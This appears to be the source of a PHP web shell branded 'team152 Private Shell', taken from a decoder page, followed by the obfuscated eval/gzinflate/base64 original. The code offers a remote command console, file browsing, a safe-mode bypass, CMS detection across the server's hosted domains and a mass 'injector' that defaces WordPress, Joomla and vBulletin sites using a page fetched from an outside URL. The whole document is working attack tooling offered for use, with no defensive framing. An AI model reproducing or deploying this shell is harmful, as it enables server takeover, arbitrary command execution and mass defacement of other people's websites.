$domain = "<a id='inj_dom" . $k . "' href=''>...</a>";
}
$k+= 1;
$nant = '<div id="inj' . $k . '">
<div class="tblbx' . $q . '" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc' . $k . '"onClick="doToggle(\'' . $k . '\');">' . $etcc[0] . '<input style="display:none;" type="checkbox" id="injchk' . $k . '" checked></div>
<div class="tblbx' . $q . '" style="width:220px;" id="inj_domain' . $k . '">' . $domain . '</div>
<div class="tblbx' . $q . '" style="width:160px;"><a class="conf" href="' . $dan['link'] . '">' . $dan['cms'] . '</a></div>
<div class="tblbx' . $q . '" style="width:120px;" id="inj_status' . $k . '">Idle...</div>
</div>';
file_put_contents("rootinject.tmp", $nant, FILE_APPEND);
$nan.= $nant;
}
}
$cnt = '<input type="text" style="display:none" id="sitecount" value="' . $k . '">';
echo $nan . $cnt;
}
die();
} elseif ($_POST['ac'] == "inject") {
error_reporting(0);
$cms = strtolower($_POST['cms']);
$cnf = $_POST['conf'];
if (file_exists(md5($_POST['deface_page']))) {
$html = file_get_contents(md5($_POST['deface_page']));
} else {
$html = file_get_contents($_POST['deface_page']);
file_put_contents(md5($_POST['deface_page']), $html);
file_put_contents("team152.html", $html);
}
if (!is_dir("cookie")) {
@mkdir("cookie", 0777);
}
switch ($cms) {
case "wordpress":
doXploitWP($cnf, $html, "uradhura123");
break;
case "joomla":
doXploitJM($cnf, $html, "uradhura123");
break;
case "vbulletin":
doXploitVB($cnf, $html);
break;
case "phpbb":
break;
case "ipb":
break;
case "mybb":
break;
case "oscommerce":
break;
case "smf":
break;
case "drupal":
break;
case "seditio":
break;
case "e107":
break;
}
throwErr("Not Added");
} elseif ($_POST['ac'] == "ssh") {
$ssh = exme($_POST['command']);
die(nl2br($ssh));
} elseif ($_POST['ac'] == "phpinfo") {
$php = phpinfo();
die($php);
};
echo '<html>
<title>team152 Private Shell</title>
<head>
<script src="http://code.jquery.com/jquery-latest.min.js"></script>
</head>
<body bgcolor="black" background="http://www.madtomatoe.com/wp-content/uploads/2010/11/matrix-animated-image.gif">
<style>
body{
font-family: "courier new";
background-color: black;
font-size:80%;
color: #28FE14;
background-image: url("data:image/gif;base64,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");
}
#sysinfo{
border: 1px solid #28FE14;
position:fixed;
padding:2px;
top:1px;
left:1px;
background-color: black;
font-size:12px;
}
#phpinfo{
border: 1px solid #28FE14;
position:fixed;
padding:2px;
top:1px;
right:1px;
background-color: black;
font-size:12px;
}
#status{
border: 1px solid #28FE14;
position:fixed;
padding:2px;
bottom:1px;
right:1px;
background-color: black;
font-size:12px;
}
#infobox{
z-index:1;
border: 1px solid white;
margin-left:auto;
margin-right:auto;
margin-top:50px;
width:600px;
background-color: black;
font-size:12px;
}
.infotitle{
padding:4px;
background-color: white;
color: black;
font-family: Thaoma;
font-size:14px;
}
.infotxt{
padding:5px;
}
.sidebar{
position:fixed;
left:1px;
top:30%;
}
.stitle{
float:left;
cursor:pointer;
padding:7px;
color:black;
background-color: white;
}
.stitle:hover{
color:red;
}
.smnu{
display:none;
background-color: black;
padding:5px;
border: 1px solid white;
float:left;
}
a{
color: #df5;
text-decoration: none;
}
a:hover{
color:white;
}
.copyright{
position:fixed;
bottom:1px;
left:1px;
padding:2px;
}
.logo{
margin:auto;
width:600px;
height:600px;
background-image: url("http://team152.site40.net/ss/drs.jpg");
<p align="center">
}
.filetable{
margin-top:2px;
width:740px;
}
.tblcnt{
text-align: center;
margin-left:2px;
color:black;
background-color: white;
padding:3px;
float:left;
border: 1px solid white;
}
.tblbx1{
height:12px;
text-align: center;
margin-left:2px;
color:white;
background-color: #333333;
padding:3px;
float:left;
border: 1px solid #333333;
}
.tblbx2{
height:12px;
text-align: center;
margin-left:2px;
color:white;
background-color: #444444;
padding:3px;
float:left;
border: 1px solid #444444;
}
.tbl{
margin-top:100px;
padding-top:2px;
padding-bottom: 2px;
margin:auto;
width:742px;
border: 1px solid white;
}
.rbox{
float:left;
border: 1px solid #28FE14;
padding:10px;
}
.smit{
background-color: black;
color: #28FE14;
}
.sshbox{
display:none;
padding-left:7px;
width:600px;
height:400px;
margin: auto;
margin-top:80px;
-webkit-border-radius: 10px;
-moz-border-radius: 10px;
border-radius: 10px;
border:3px solid #FFF5F5;
background-color:#080500;
overflow:auto;
}
#sshcmd{
width:450px;
background-color: #080500;
color:#28FE14;
border:none;
}
</style>
<body>
<div class="logo" id="logo"></div>
<div id="sysinfo"><strong>OS:</strong> ';
echo php_uname("s") . " - " . php_uname("r") . " / " . php_uname("m");;
echo '</div>
<div id="phpinfo"> ';
$srvsoft = explode(" ", $_SERVER['SERVER_SOFTWARE']);
echo $srvsoft[0];
echo " PHP " . phpversion();
if (ini_get('safe_mode')) {
echo " <font color='red'>Safe Mode On</font>";
} else {
echo " <font color='blue'>Safe Mode Off</font>";
};
echo '</div>
<div id="tbl" class="tbl" style="display:none;">
<div class="filetable">
<div class="tblcnt" style="width:220px;">Name</div>
<div class="tblcnt" style="width:80px;">Size</div>
<div class="tblcnt" style="width:100px;">Modify</div>
<div class="tblcnt" style="width:100px;">Owner</div>
<div class="tblcnt" style="width:100px;">Permission</div>
<div class="tblcnt" style="width:80px;">Action</div>
</div>
<div id="filest"></div>
<div style="clear:both;"></div>
</div>
<div id="inject" class="tbl" style="display:none;">
<div class="filetable">
<div class="tblcnt" style="width:200px; cursor:pointer;" onClick="doSlct();">User</div>
<div class="tblcnt" style="width:220px;">Sitename</div>
<div class="tblcnt" style="width:160px;">CMS</div>
<div class="tblcnt" style="width:120px;">Status</div>
</div>
<div id="injtbl"></div>
<div style="clear:both;"></div>
</div>
<div id="infobox" style="display:none;"><div class="infotitle"><a href="" onclick="$(\'#infobox\').hide();return false;" style="color:black;">[-]</a> <span id="infotitle">Information</span></div><div class="infotxt" id="infotxt"></div></div>
<script>
var sidebar = false;
var sidebar2 = false;
function sidebarz(){
$(\'#logo\').hide();
if(sidebar){
$(\'#smnu\').hide();
sidebar = false;
}else{
$(\'#smnu\').show();
sidebar = true;
}
}
function sidebarz2(){
if(sidebar2){
$(\'#smnu2\').hide();
sidebar2 = false;
}else{
$(\'#smnu2\').show();
sidebar2 = true;
}
}
function filebrs(val){
hideAll();
$(\'#status\').html(\'Status: Requesting...\');
$.post("", { ac: "browse", path: val},
function(data) {
$(\'#tbl\').show();
$(\'#status\').html(\'Status: Completed (:\');
$(\'#filest\').html(data);
});
}
function doUpdt(val){
var refreshId = setInterval(function() {
$("#injtbl").load(\'rootinject.tmp\');
}, 5000);
$.ajaxSetup({ cache: false });
hideAll();
$(\'#inject\').show();
$(\'#status\').html(\'Status: Requesting...\');
$.post("", { ac: val},
function(data) {
refreshId = "";
$(\'#sidebar2\').show();
$(\'#status\').html(\'Status: Completed (:\');
$(\'#injtbl\').html(data);
});
}
function hideAll(){
k1 = 0;
k2 = 0;
$(\'#sidebar2\').hide();
$(\'#tbl\').hide();
$(\'#inject\').hide();
$(\'#infobox\').hide();
$(\'#sshbox\').hide();
}
function doReq(val){
hideAll();
$(\'#inject\').show();
$(\'#status\').html(\'Status: Requesting...\');
$.post("", { ac: val},
function(data) {
$(\'#sidebar2\').show();
$(\'#status\').html(\'Status: Completed (:\');
$(\'#injtbl\').html(data);
});
}
function doReq2(val){
hideAll();
$(\'#status\').html(\'Status: Requesting...\');
$.post("", { ac: val},
function(data) {
$(\'#infobox\').show();
$(\'#status\').html(\'Status: Completed (:\');
$(\'#infotxt\').html(data);
});
}
//Js Multi thread post request by Elo (:
var k1 = 1; var k2 = 0; var req_limit = 9;
function doInject(){
var i = 0; var j = 0;
$(\'.conf\').each(function(){
i += 1;
var id = $(this).attr(\'title\');
if(id > k1){
j += 1; k1 += 1;
var link = $(this).attr(\'href\');
var domain = $(\'#inj_dom\' + id).html();
var cms = $(this).html();
doPost2(link,cms,id,domain);
}
if(j > req_limit){return false;}
});
}
function doPost2(link,cmz,id,dmn){
if($(\'#injchk\'+id).is(\':checked\')){
$(\'#inj_status\' + id).html(\'Injecting...\');
$.ajax({
url: "",
type: "POST",
timeout: 60000,
data: {ac: "inject", conf: link, domain: dmn, cms: cmz, ignore_def: $(\'#ignore_def:checked\').val(), n404_php: $(\'#404_php:checked\').val(), nindex_php: $(\'#index_php:checked\').val(), nhome_php: $(\'#home_php:checked\').val(), narchive_php: $(\'#archive_php:checked\').val(), ncomment_php: $(\'#comment_php:checked\').val(), com_install: $(\'#use_com:checked\').val(), deface_page: $(\'#deface_page\').val()},
dataType: "text"
}).done(function(msg) {
k2 += 1;
$(\'#inj_status\' + id).html(\'Parse Error\');
$(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
var res_data = JSON.parse(msg);
if(res_data.status == "success"){
$(\'#inj_domain\' + id).html(\'<a class="injwork" href="\' + res_data.site + \'">\' + res_data.site + \'</a>\');
$(\'#inj_status\' + id).css({"background-color" : "green", "color" : "white"});
$(\'#inj_status\' + id).html(\'Success\');
$(\'#injst\' + id).removeClass("conf");
}
else{
if(res_data.status == "error"){
$(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
$(\'#inj_status\' + id).html(res_data.msg);
$(\'#inj_status\' + id).addClass("injerror");
$(\'#injst\' + id).removeClass("conf");
}else{
$(\'#inj_status\' + id).addClass("injerror");
$(\'#inj_status\' + id).html(\'Unknown\');
$(\'#injst\' + id).removeClass("conf");
}
}
updateInjSts(k2);
if(k1 == k2){doInject();}
}).fail(function(jqXHR, textStatus) {
k2 += 1;
$(\'#inj_status\' + id).css({"background-color" : "black", "color" : "white"});
$(\'#inj_status\' + id).html(\'Timeout\');
updateInjSts(k2);
if(k1 == k2){doInject();}
});
}else{
k2 += 1;
updateInjSts(k2);
if(k1 == k2){doInject();}
}
}
//Js Multi thread post request by Elo (:
function updateInjSts(k){
var tc = $(\'#sitecount\').val();
if(tc > k){
$(\'#status\').html("Status: " + k + "/" + tc + " Injected");
}else{
$(\'#status\').html("Status: Injection Complete (:");
}
}
function rmvErr(){
$(\'.injerror\').each(function(){
var nano = $(this).parent();
$(nano).remove();
});
}
function rmvSlct(){
$(\'.conf\').each(function(){
var id = $(this).attr(\'title\');
if($(\'#injchk\'+id).is(\':checked\')){
$(\'#inj\' + id).remove();
}
});
}
function retryTimeout(){
k1 = 1; k2 = 0;
doInject();
}
function doSlct(){
$(\'.conf\').each(function(){
var id = $(this).attr(\'title\');
doToggle(id);
});
}
function doToggle(dd){
if($(\'#injchk\'+dd).is(\':checked\')){
$(\'#injc\'+dd).css(\'background-color\',\'red\');
$(\'#injchk\'+dd).attr(\'checked\',false);
}else{
$(\'#injc\'+dd).css(\'background-color\',\'#76BBEB\');
$(\'#injchk\'+dd).attr(\'checked\',true);
}
}
function doSSH(){
$(\'#status\').html("Status: Requesting...");
var cmd = $(\'#sshcmd\').val();
$(\'#sshcmd\').val("");
$.post("", { ac: "ssh",command: cmd},
function(data) {
$(\'#sshoutput\').append("[root@team152~]# <br />"+data+"<br />");
$(\'#status\').html("Status: Done.");
});
}
</script>
<div class="sshbox" id="sshbox">
<br />
<div id="sshoutput"></div>
[root@team152~]# <input onkeydown="if (event.keyCode == 13) doSSH();" type="text" id="sshcmd">
</div>
<div id="sidebar" class="sidebar">
<div class="smnu" id="smnu" class="smnu">
» <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'Security Information\');doReq2(\'secinfo\');return false;">Security Vulnerability</a></br>
» <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'System Information\');doReq2(\'sysinfo\');return false;">System Information</a></br>
» <a href="" onClick="$(\'#infotitle\').html(\'PHP Info\');doReq2(\'phpinfo\');return false;">PHP Info</a></br>
» <a href="" onClick="filebrs(\'\'); return false;">File Browser</a></br>
» <a href="" onClick="$(\'#infotitle\').html(\'Scanned Domains\');doReq2(\'chknamed\');return false;">Get All Domains</a></br>
» <a href="" onClick="doReq(\'chkph\');return false;">CMS Detector [Simple]</a></br>
» <a href="" onClick="$(\'#inject\').show();doUpdt(\'chkph2\');return false;">CMS Detector [root]</a></br>
» <a href="" onClick="doReq2(\'safebypass\');return false;">Bypass PHP Safe_Mode</a></br>
» <a href="">Network Tools</a></br>
» <a href="">SQL Manager(Coming Soon)</a></br>
» <a href="" onClick="hideAll(); $(\'#sshbox\').show(); return false;">Command Console</a></br>
» <a href="?ac=killme">Kill Me</a></br>
</div>
<div class="stitle" onClick="sidebarz();">O</br>P</br>T</br>I</br>O</br>N</br>S</div>
</div>
<div id="sidebar2" class="sidebar" style="display:none;right:1px;left:auto;">
<div class="smnu" style="float:right;" id="smnu2" class="smnu">
<div id="injmain">
» <a href="" onClick="doInject(); return false;">Start Injecting</a></br>
» <a href="" onClick="">Export</a></br>
» <a href="" onClick="rmvErr(); return false;">Remove Error</a></br>
» <a href="" onClick="rmvSlct(); return false;">Remove Selected</a></br>
» <a href="" onClick="retryTimeout(); return false;">Retry timeout</a></br>
» <a href="" onClick="alert(\'Do It Manually :p\'); return false;">Submit to Zone-H</a></br>
» <a href="" onClick="$(\'#injmain\').hide(); $(\'#inj2nd\').show(); return false;">Settings</a></br>
</div>
<div id="inj2nd" style="display:none;">
<div class="rbox">
<div style="clear:both;"></div>
<center><u>WordPress</u></center><br>
<input type="checkbox" name="404_php" id="404_php" checked>404.php<br />
<input type="checkbox" name="archive_php" id="archive_php" checked>archive.php<br />
<input type="checkbox" name="index_php" id="index_php" checked>index.php<br />
<input type="checkbox" name="home_php" id="home_php" checked>home.php<br />
<input type="checkbox" name="comment_php" id="comment_php" checked>comment.php<br /><br /><br />
</div>
<div class="rbox">
<center><u>Joomla</u></center><br>
<input type="checkbox" name="use_com" id="use_com" checked>Use Com Installer<br />
<input type="checkbox" id="ignore_def">Ignore Default Templete<br />
</div>
<div class="rbox">
<center><u>Default</u></center><br>
Req/s: <input type="text" class="smit" value="10" onChange="req_limit = $(this).val();"><br />
Deface Page Link: <input type="text" class="smit" id="deface_page" value="http://naramamandiri.com/index.html"><br /><br />
</div>
<div style="clear:both;"></div><br />
<a href="" onClick="$(\'#injmain\').show(); $(\'#inj2nd\').hide(); return false;">Go Back</a>
</div>
</div>
<div class="stitle" style="float:right;" onClick="sidebarz2();">I</br>N</br>J</br>E</br>C</br>T</br>O</br>R</div>
</div>
<div style="clear:both;"></div>
<div id="status">Status: Idle...</div>
<div class="copyright">Copyright © <a href=""><font color="red">team152</font></a></div>
</body>
</html>';
Did this file decode correctly?
Original Code
$X= 'LyogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgkJCQkJCUF1dGhvcjogICAgIEFiZHVsIFJhaG1hbiBTaGVyemFkICh3d3cuYWZnaGFuY3liZXJzb2Z0LmNvbSkKCQkJCQkJRW1haWw6CQlpbmZvQGFmZ2hhbmN5YmVyc29mdC5jb20KCQkJCQkJQmlvZ3JhcGh5OglBYmR1bCBSYWhtYW4gU2hlcnphZCB3YXMgYm9ybiBhbmQgYnJvdWdodCB1cCBpbiBIZXJhdC1BZmdoYW5pc3RhbiBhbmQgY29tcGxldGVkIG15IHVuZGVyLWdyYWR1YXRlIHN0dWRpZXMgaW4gQ29tcHV0ZXIgU2NpZW5jZSBGYWN1bHR5IG9mIEhlcmF0IFVuaXZlcnNpdHkgaW4gMjAwNiBvYnRhaW5pbmcgbXkgQi5DLlMgZGVncmVlIGFzIHRoZSBiZXN0IG91dGdvaW5nIHNlbmlvciBzdHVkZW50IGZyb20gdGhpcyBmYWN1bHR5LgoKCQkJCQkJCQkJSGF2aW5nIGludGVsbGVjdHVhbGl0eSBpbiBDb21wdXRlciBQcm9ncmFtbWluZyBhbmQgSW5mb3JtYXRpb24gRGF0YWJhc2UgTWFuYWdlbWVudCBTeXN0ZW0sIEkgd2FzIG9mZmVyZWQgdG8gY29tbWVuY2UgdGVhY2hpbmcgaW4gQ29tcHV0ZXIgU2NpZW5jZSBGYWN1bHR5IG9mIEhlcmF0IFVuaXZlcnNpdHkuIEFmdGVyIGEgd2hpbGUgSSBqb2luZWQgQ1JTIHRvIHdvcmsgYXMgdGhlIERhdGFiYXNlIE1hbmFnZXIgZm9yIHRoZSBBREEgcHJvZ3JhbS4gSSB3b3JrZWQgZm9yIENSUyBmb3IgYSBjb3VwbGUgb2YgeWVhcnMgYWZ0ZXIgd2hpY2ggSSB3YXMgYXdhcmRlZCBhIHNjaG9sYXJzaGlwIGJ5IHRoZSBnb3Zlcm5tZW50IG9mIEdlcm1hbnkgdG8gcHVyc3VlIG15IE1hc3RlciBpbiBJbmZvcm1hdGlvbiBEYXRhYmFzZSBNYW5hZ2VtZW50IGFuZCBTb2Z0d2FyZSBFbmdpbmVlcmluZyBpbiBCZXJsaW4gYXQgVFUtQmVybGluIFVuaXZlcnNpdHkuCgoJCQkJCQkJCQlJIGFtIGN1cnJlbnRseSBhbHNvIHRlYWNoaW5nIGF0IHRoZSBIZXJhdCBVbml2ZXJzaXR5IGFzIHdlbGwgYXMgYWN0aW5nIGFzIHRoZSBoZWFkIG9mIEluZm9ybWF0aW9uIFN5c3RlbXMgTWFuYWdlciBib3RoIGluIENSUyBhbmQgSGVyYXQgVW5pdmVyc2l0eSB0byBzdXBwb3J0IHRoZSBlZHVjYXRpb25hbCBuZWVkcy4KCQkJCQkJCQktLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0gKi8='; eval(gzinflate(base64_decode('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